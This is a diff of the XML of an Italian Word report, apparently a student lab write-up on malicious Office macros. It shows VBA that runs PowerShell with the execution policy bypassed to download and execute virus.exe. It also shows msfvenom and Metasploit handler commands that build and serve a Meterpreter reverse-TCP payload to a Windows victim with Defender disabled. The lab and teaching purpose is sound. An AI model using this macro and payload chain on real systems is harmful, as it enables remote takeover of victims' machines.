+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PowerShell per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>eseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; comandoDaEseguire2, 0, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Rilascio</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>l'oggetto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set shell = Nothing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>End Sub</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>CODICE MACRO</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> OFFUSCATO</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Titolo1"/>
       </w:pPr>
       <w:r>
@@ -430,6 +2773,546 @@
       <w:r>
         <w:t xml:space="preserve"> state configurate.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ATTACCANTE</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>L’attaccante</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">è la </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>macchina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Kali Linux </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lezione</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, il software </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>utilizzato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>creare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> il server C2 è Metasploit, è </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>utilizzato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metodo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> visto a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lezione</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, di </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seguito</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>riporto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>//</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>creo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il software </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scaricare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>nella</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>macchina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>della</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>vittima</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p windows/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> LHOST </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ipAttaccante</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> LPORT porta -f exe &gt; payload.exe</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>//</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>metto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>ascolto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>use exploit/multi/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>handler</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>set PAYLOAD windows/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reverse_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">set HOST </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ipAttaccante</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>set LPORT 400</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">// </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>metto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>ascolto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> un </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>altro</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> server per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>permettere</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scaricare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il payload </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">python -m </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>http.server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 8000</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>VITTIMA</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>La</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vittima</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> è </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>una</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>macchina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Windows con Windows Defender </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>disabilitato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> e con </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pacchetto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Office </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>installato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
@@ -1751,23 +4634,6 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Documento" ma:contentTypeID="0x01010003AD22B01210FE489D9BE433888FACA9" ma:contentTypeVersion="16" ma:contentTypeDescription="Creare un nuovo documento." ma:contentTypeScope="" ma:versionID="09fad2276ea52fc6ec20be57fa2916a4">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xmlns:ns4="f1c65361-0737-4e30-bb3a-9e2ed6feafec" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2cd1dbdccf64e950842932f53b8e29c6" ns3:_="" ns4:_="">
     <xsd:import namespace="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
@@ -2008,29 +4874,28 @@
 </ct:contentTypeSchema>
 </file>
 
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
+</file>
+
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
+</file>
+
 <file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
 <b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F74C8422-D422-4F67-B8D4-238A7F7173C7}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -2049,6 +4914,24 @@
 </ds:datastoreItem>
 </file>
 
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
 <file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
   <ds:schemaRefs>

--- a/Report_MalDoc.docx
+++ b/Report_MalDoc.docx
@@ -220,10 +220,7 @@
         <w:t>=</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">"(New-Object </w:t>
+        <w:t xml:space="preserve"> "(New-Object </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -279,20 +276,14 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>salva</w:t>
-      </w:r>
-      <w:r>
-        <w:t>re</w:t>
+        <w:t>salvare</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>\</w:t>
       </w:r>
       <w:r>
-        <w:t>virus.exe</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">virus.exe </w:t>
       </w:r>
       <w:r>
         <w:t>" &amp; "')"</w:t>
@@ -300,50 +291,143 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t>comandoDaEseguire2=</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> " &amp; '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>percorso</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>dove</w:t>
+      </w:r>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>è\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>salvato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>virus.exe'"</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Esegui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PowerShell per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scaricare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:t>comandoDaEseguire</w:t>
       </w:r>
-      <w:r>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>" &amp; '</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>percorso</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:t>dove</w:t>
-      </w:r>
-      <w:r>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:t>è\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>salvato</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>\</w:t>
